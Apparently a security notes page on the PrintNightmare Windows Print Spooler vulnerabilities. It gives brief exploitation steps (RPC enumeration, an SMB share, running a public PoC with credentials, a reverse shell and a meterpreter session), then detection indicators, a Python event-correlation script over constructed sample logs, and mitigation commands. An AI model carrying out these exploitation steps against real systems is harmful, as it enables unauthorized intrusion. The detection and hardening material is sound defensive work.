# Print Nightmare

* Privilege escalation through the Print Spooler service
* The service binary is `C:\Windows\System32\spoolsv.exe`
* Enabled by default
* [CVE-2021-1675](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675) (locally exploitable) and [CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) (RCE) both affect the print spooler
* The RCE path goes over [DCE/RPC](https://wiki.wireshark.org/DCE/RPC), using `RpcAddPrinterDriver` or `RpcAddPrinterDriverEx`

## Usage

* Prepare a reverse shell
* Check whether the target exposes the vulnerable RPC interfaces (MS-RPRN / MS-PAR); `-E` is needed so that `|` is treated as alternation

```sh
rpcdump.py @$TARGET_IP | grep -E 'MS-RPRN|MS-PAR'
```

* Start an SMB server

```sh
smbserver.py share . -smb2support
```

* Run the PoC with credentials to elevate

```sh
python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_IP
```

* Use the meterpreter session

## IOCs

* `RpcAddPrinterDriverEx()` is called
* [Sygnia](https://www.sygnia.co/demystifying-the-printnightmare-vulnerability) explains the indicators
* [Splunk queries](https://www.splunk.com/en_us/blog/security/i-pity-the-spool-detecting-printnightmare-cve-2021-34527.html)

* Relevant logs are `Microsoft-Windows-PrintService/Admin` and `Microsoft-Windows-PrintService/Operational`
* Event IDs `316, 808, 811, 31017, 7031`

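A correlation over the event IDs listed above, as an added detection example that is not part of the original page: it flags a 316 driver-add that is followed on the same host by an 808 plug-in load failure and a 7031 spooler crash, and otherwise only drivers missing from an allow-list. The event messages, host names, allow-list and five-minute window are constructed for the example, and the 316 message format (`Printer driver X for Windows ...`) is assumed from the usual PrintService text.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
import re

# Event IDs from the page: 316 = printer driver added/updated, 808 = spooler failed
# to load a plug-in module, 7031 = Service Control Manager: Spooler terminated.
DRIVER_ADDED, PLUGIN_LOAD_FAILED, SERVICE_CRASHED = 316, 808, 7031
DRIVER_RE = re.compile(r"Printer driver (.+?) for Windows")  # name inside the 316 text
WINDOW = timedelta(minutes=5)  # assumed correlation window

@dataclass
class Event:
    time: datetime
    host: str
    event_id: int
    message: str

def driver_name(ev):
    m = DRIVER_RE.search(ev.message)
    return m.group(1) if m else None

def correlate(events, approved_drivers, window=WINDOW):
    """One (host, driver, severity) per 316: 'low' = driver not on the allow-list,
    'medium' = an 808 followed on that host in the window, 'high' = 808 and 7031 did."""
    events = sorted(events, key=lambda e: e.time)
    alerts = []
    for i, ev in enumerate(events):
        if ev.event_id != DRIVER_ADDED:
            continue
        name = driver_name(ev)
        followers = {f.event_id for f in events[i + 1:]
                     if f.host == ev.host and f.time - ev.time <= window}
        if {PLUGIN_LOAD_FAILED, SERVICE_CRASHED} <= followers:
            sev = "high"
        elif PLUGIN_LOAD_FAILED in followers:
            sev = "medium"
        elif name not in approved_drivers:
            sev = "low"
        else:
            continue  # approved driver, nothing else seen: routine install
        alerts.append((ev.host, name, sev))
    return alerts

# Constructed sample records (not real logs): an exploitation-like sequence on DC01, then a routine install on WS07.
T0 = datetime(2021, 7, 1, 10, 0, 0)
SAMPLE_EVENTS = [
    Event(T0, "DC01", 316, "Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- UNIDRV.DLL, unsigned.dll."),
    Event(T0 + timedelta(seconds=2), "DC01", 808, "The print spooler failed to load a plug-in module C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\unsigned.dll."),
    Event(T0 + timedelta(seconds=40), "DC01", 7031, "The Print Spooler service terminated unexpectedly."),
    Event(T0 + timedelta(hours=1), "WS07", 316, "Printer driver Microsoft XPS Document Writer v4 for Windows x64 Version-4 was added or updated."),
]
APPROVED_DRIVERS = {"Microsoft XPS Document Writer v4"}  # assumed allow-list
```

`correlate(SAMPLE_EVENTS, APPROVED_DRIVERS)` returns a single high-severity alert for DC01; the approved WS07 install produces nothing.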
## Mitigation

* [Microsoft advisory for CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527)
* Stop and disable the service

```powershell
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
```

* Disable inbound remote printing via Group Policy, under

```text
Computer Configuration/Administrative Templates/Printers
```